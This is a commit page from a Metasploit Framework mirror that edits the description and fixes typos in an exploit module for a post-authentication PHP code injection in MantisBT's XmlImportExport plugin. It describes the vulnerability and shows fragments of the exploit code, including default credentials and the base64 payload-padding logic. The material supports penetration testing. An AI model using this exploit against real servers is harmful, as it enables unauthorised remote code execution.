infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

update description and fix typos

bug/bundler_fix
Juan Escobar 2014-11-09 09:10:01 -05:00
parent 5d17637038
commit 9cce7643ab
1 changed files with 5 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
modules/exploits/multi/http/mantisbt_php_exec.rb
View File

@ -15,8 +15,9 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability',
'Description' => %q{
When importing data with the plugin, user input passed through the "description" field (and the "issuelink" attribute) of the uploaded XML file isn't properly sanitized before being used in a call to the preg_replace() function which uses the 'e' modifier.
This can be exploited to inject and execute arbitrary PHP code when the Import/Export plugin is installed.
This module exploits a post-auth vulnerability found in MantisBT versions 1.2.0a3 up to 1.2.17 when the Import/Export plugin is installed.
The vulnerable code exists on plugins/XmlImportExport/ImportXml.php, which receives user input through the "description" field and the "issuelink" attribute of an uploaded XML file and passes to preg_replace() function with the /e modifier.
This allows a remote authenticated attacker to execute arbitrary PHP code in the remote machine.
},
'License' => MSF_LICENSE,
'Author' =>
@ -38,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
OptString.new('USERNAME', [ true, 'Username to authenticate as', 'administrator']),
OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', 'root']),
OptString.new('TARGETURI', [ true, 'Base x7 Chat directory path', '']),
OptString.new('TARGETURI', [ true, 'Base directory path', '']),
], self.class)
end
@ -57,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
# remove comments, line breaks and spaces of php_code
payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')
# clean b64 payload (we can not use quotes or apostrophes and b64 string must not contain equals)
# clean b64 payload
while Rex::Text.encode_base64(payload_clean) =~ /=/
payload_clean = "#{ payload_clean } "
end